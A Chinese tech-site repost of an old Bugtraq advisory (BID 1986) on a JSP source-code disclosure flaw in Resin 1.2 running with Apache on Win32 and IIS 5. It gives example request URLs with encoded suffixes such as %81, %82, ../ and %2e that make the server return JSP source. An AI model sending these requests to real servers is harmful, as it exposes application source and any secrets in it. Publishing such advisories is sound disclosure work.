正在浏览栏目导航：首页 > 网络编程 > jsp

Resin 1.2 重要源代码暴露漏洞

时间:2007-01-05 13:03:00 来源: 作者: 点击:次出处:技术无忧

关键字：Resi

bugtraq id 1986
class Input Validation Error
cve GENERIC-MAP-NOMATCH
remote Yes
local Yes
published November 23, 2000
updated November 23, 2000
vulnerable Caucho Technology Resin 1.2
- Microsoft IIS 5.0
+ Microsoft Windows NT 2000
- Apache Group Apache 1.3.6win32

Apache (Win32):
..
%2e..
%81
%82
Example: http://target/filename.jsp%81

Resin Web Server:
../
Example: http://target/filename.jsp../

IIS 5 requesting the URL encoded with ASCII:
'%2' instead of '.'
Example: http://target/filename%2ejsp

访问技术无忧网，软硬件通吃保你技术无忧！网址http://www.pc51.net

网友评论加入收藏打印本文错误报告论坛讨论关闭此页

上一篇：多中WEB服务器的通用JSp源代码暴露漏洞

下一篇：在HTTP请求中添加特殊字符导致暴露JSP源代码文件

相关文章

配置iis和resin1.1 (2007-01-05 13:02:41)
Resin服务器平台介绍简介 (2007-01-05 13:02:40)
apache+resin (2007-01-05 13:02:40)
如何将resin与apache相联 (2007-01-04 10:28:34)
Freebsd+Resin成功建立支持jsp平台 (2006-12-21 16:11:57)
Windows+Apache+resin配置 (2006-12-21 16:11:52)
apache+resin+pureftp的虚拟主机和负载均衡 (2006-12-21 16:11:52)
Resin全攻略 (2006-12-21 16:11:51)
Resin服务器的使用 (2006-12-21 16:11:51)
Resin和iis配置多个站点 (2006-12-21 15:13:12)

文章评论

共有 0 位网友发表了评论此处只显示部分留言点击查看完整评论页面

特别推荐

排行榜

300x250广告位招租

最新信息

关于站点 - 广告服务 - 联系我们 - 版权隐私 - 免责声明 - 成员列表 - 技术支持 - 网站地图 - 留言中心 - 排行榜 - 返回顶部

违法不良信息举报中心　网络110报警服务　苏ICP备05047822
本站由宋氏电脑主办地址:江苏省吴江市震泽镇南路1518号

QQ交流群:技术交流:2712491、初学者群:18554851、生活休闲群:39110683(加入时声明“技术无忧”)
Copyright © 2000-2008 www.Pc51.Net online services. All rights reserved. This page last updated 2008-12-18 18:47:01